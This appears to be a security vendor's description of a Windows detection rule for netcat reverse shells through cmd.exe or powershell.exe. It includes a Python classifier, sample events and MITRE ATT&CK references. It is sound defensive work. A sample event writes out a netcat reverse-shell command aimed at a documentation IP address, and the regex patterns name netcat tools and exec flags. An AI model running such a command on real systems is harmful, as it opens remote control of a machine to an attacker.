
Summary
This rule is designed to detect potential attempts to execute commands via a reverse shell using the netcat utility on Windows systems. It operates by monitoring process events for the execution of cmd.exe or powershell.exe with specific arguments indicating misuse of these interpreters to establish unauthorized command execution channels. The detection logic focuses on the presence of specific argument patterns often associated with netcat, which facilitates remote command execution. Additionally, guidelines for investigation and incident response are provided, emphasizing the importance of analyzing the process execution chain, checking network connections, and responding adequately to any confirmed or suspected incidents. The rule has a high severity rating, indicating a significant risk of unauthorized execution on endpoints. False positives must be evaluated, particularly in contexts where legitimate IT support activities are present. The use of MITRE ATT&CK framework references enhances the understanding of the tactics and techniques involved in this attack vector.
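To make the detection logic concrete, the following added example (not the rule's own query or the vendor's code) evaluates a small set of constructed Windows process-creation events. It assumes a simplified event schema (image name, command line, parent image name) and an assumed list of netcat image names and exec-style flags; a real rule would be tuned to the telemetry source's field names and to the environment. The sample events and the 198.51.100.0/24 addresses are constructed for illustration and use a documentation range.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass
class ProcessEvent:
    process_name: str   # image name of the created process
    command_line: str   # full command line of the created process
    parent_name: str    # image name of the parent process

# Interpreters the rule is concerned with (from the summary above).
INTERPRETERS = {"cmd.exe", "powershell.exe"}

# Assumed netcat image names; the actual rule may use a different list.
NETCAT_NAMES = {"nc.exe", "ncat.exe", "netcat.exe", "nc64.exe"}

# A netcat image name appearing as its own token in a command line
# (preceded by start of line, a path separator, whitespace or a quote),
# so that unrelated words containing "nc" (e.g. sync.ps1) do not match.
NETCAT_TOKEN = re.compile(
    r'(?:^|[\\/\s"])(?:nc|ncat|netcat|nc64)(?:\.exe)?(?=[\s"]|$)', re.IGNORECASE)

# Assumed flags that hand a program to the connection; plain connectivity
# checks (e.g. -zv) do not use them, which keeps IT port tests out of scope.
NETCAT_EXEC_FLAG = re.compile(r'(?:^|\s)(?:-e|--exec|--sh-exec)(?=\s|$)', re.IGNORECASE)

def classify(event: ProcessEvent) -> Optional[str]:
    """Return a reason string when the event looks like a netcat relay of an
    interpreter, or None when it does not match."""
    if event.process_name.lower() not in INTERPRETERS:
        return None
    # Pattern 1: the interpreter is a child of a netcat binary, i.e. netcat
    # relayed the connection into cmd.exe / powershell.exe.
    if event.parent_name.lower() in NETCAT_NAMES:
        return "interpreter spawned by netcat"
    # Pattern 2: the interpreter itself launches netcat with an exec flag.
    cmd = event.command_line
    if NETCAT_TOKEN.search(cmd) and NETCAT_EXEC_FLAG.search(cmd):
        return "interpreter launches netcat with an exec flag"
    return None

def triage(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Run classify() over a batch and return (command_line, reason) pairs."""
    alerts = []
    for event in events:
        reason = classify(event)
        if reason:
            alerts.append((event.command_line, reason))
    return alerts

# Constructed sample telemetry: two matches, three non-matches.
SAMPLE_EVENTS = [
    ProcessEvent("cmd.exe", "cmd.exe", "nc.exe"),
    ProcessEvent("cmd.exe", "cmd.exe /c nc.exe -e cmd.exe 198.51.100.7 4444", "explorer.exe"),
    ProcessEvent("cmd.exe", "cmd.exe /c ipconfig /all", "explorer.exe"),
    # Legitimate IT port check: netcat present, but no exec flag.
    ProcessEvent("cmd.exe", "cmd.exe /c nc.exe -zv 198.51.100.7 443", "explorer.exe"),
    # Script name contains "nc" as a substring only; must not match.
    ProcessEvent("powershell.exe", "powershell.exe -File C:\\scripts\\sync.ps1", "svchost.exe"),
]

if __name__ == "__main__":
    for command_line, reason in triage(SAMPLE_EVENTS):
        print(f"ALERT: {reason}: {command_line}")
```

The two patterns map onto the investigation guidance above: pattern 1 is found by walking the parent/child process chain, pattern 2 by inspecting the interpreter's own arguments. Either hit should be followed by a check of the network connections the flagged process opened, and the port-test event shows why the exec-flag condition matters for keeping legitimate IT support activity out of the alert queue.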
Categories
- Endpoint
- Windows
Data Sources
- Process
ATT&CK Techniques
- T1059
- T1059.001
- T1059.003
Created: 2025-10-14